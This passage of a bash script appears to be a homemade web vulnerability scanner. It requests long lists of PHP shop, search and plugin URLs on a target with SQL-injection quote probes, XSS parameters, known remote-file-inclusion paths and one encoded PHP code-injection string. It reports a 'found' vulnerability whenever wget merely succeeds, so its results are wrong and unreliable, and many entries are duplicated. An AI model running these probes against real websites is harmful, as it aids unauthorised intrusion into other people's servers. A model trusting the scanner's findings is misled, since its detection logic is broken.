d="/freedownload.php?bookid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/fullDisplay.php?item='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/getbook.php?bookid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/GetItems.php?itemid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/giftDetail.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/help.php?CartId='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/home.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?cart='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?cartID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/info.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item.php?eid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item.php?item_id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item.php?itemid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item.php?model='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item.php?prodtype='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item.php?shopcd='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item_list.php?maingroup'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item_show.php?code_no='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/itemDesc.php?CartId='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/itemdetail.php?item='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/itemdetails.php?catalogid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/itemdetails.php?catalogid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/itemdetails.php?catalogid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/itemdetails.php?catalogid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/itemdetails.php?catalogid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/listcategoriesandproducts.php?idCategory='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modline.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/myaccount.php?catid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/myaccount.php?catid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/news.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/order.php?BookID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/order.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/page.php?PartID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/payment.php?CartID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pdetail.php?item_id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/powersearch.php?CartId='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/price.php'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/privacy.php?cartID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/prodbycat.php?intCatalogID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/prodetails.php?prodid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/prodlist.php?catid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/product.php?bookID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/product.php?intProdID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/productDetails.php?idProduct='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/productDisplay.php'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/productlist.php?ViewType=Category&CategoryID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/productinfo.php?item='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/productpage.php'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products.php?keyword='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products_category.php?CategoryID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products_detail.php?CategoryID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/productsByCategory.php?intCatalogID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/prodView.php?idProduct='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/promo.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/promotion.php?catid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pview.php?Item='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/resellers.php?idCategory='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/results.php?cat='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/savecart.php?CartId='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/search.php?CartID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/searchcat.php?search_id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Select_Item.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Services.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
else
echo "ws > sql not found"
fi
elif [ $a == -xss ]
then
echo "The search started if we found vulnerability we will tell you ......"
echo "---------------------------------------------------------------------"
d=".php?cmd="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?z="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?q="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?searche="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?query="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?searchstring="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?keyword="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?file="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php=years="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?txt="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?tag="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?max="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?from="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?from="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?pass="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=".php?feedback="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > xss found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
else
echo "ws > xss not found"
fi
elif [ $a == -fl ]
then
echo "The search started if we found vulnerability we will tell you ......"
echo "---------------------------------------------------------------------"
d="/classes.php?LOCAL_PATH="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "ws > remotefile include not found"
fi
d="/help_text_vars.php?dir&PGV_BASE_DIRECTORY="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/static.php?load="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/common.php?include_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/osticket/include/main.php?config[search_disp]=true&include_dir="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/shoutbox/expanded.php?conf="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/templates/headline_temp.php?nst_inc="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/forum/admin/index.php?inc_conf="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/page=login/index.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/archive.php?CONFIG[script_path]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/paginedinamiche/main.php?pagind="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/folder.php?id="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/default.php?page=home"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="forums.html/modules.php?name="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/includes/orderSuccess.inc.php?glob="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/php?bodyfile="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ihm.php?p=*"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ashnews.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ashnews.php?pathtoashnews="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/html&highlight=%2527.include($_GET[a]),exit.%2527&d="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="kietu/hit_js.php, allinurl:kietu/hit_js.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/kietu/index.php?kietu[url_hit]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Popper/index.php?"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules.php?name=allmyguests"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Popper/index.php?childwindow.inc.php?form="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/include/footer.inc.php?_AMLconfig[cfg_serverpath]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
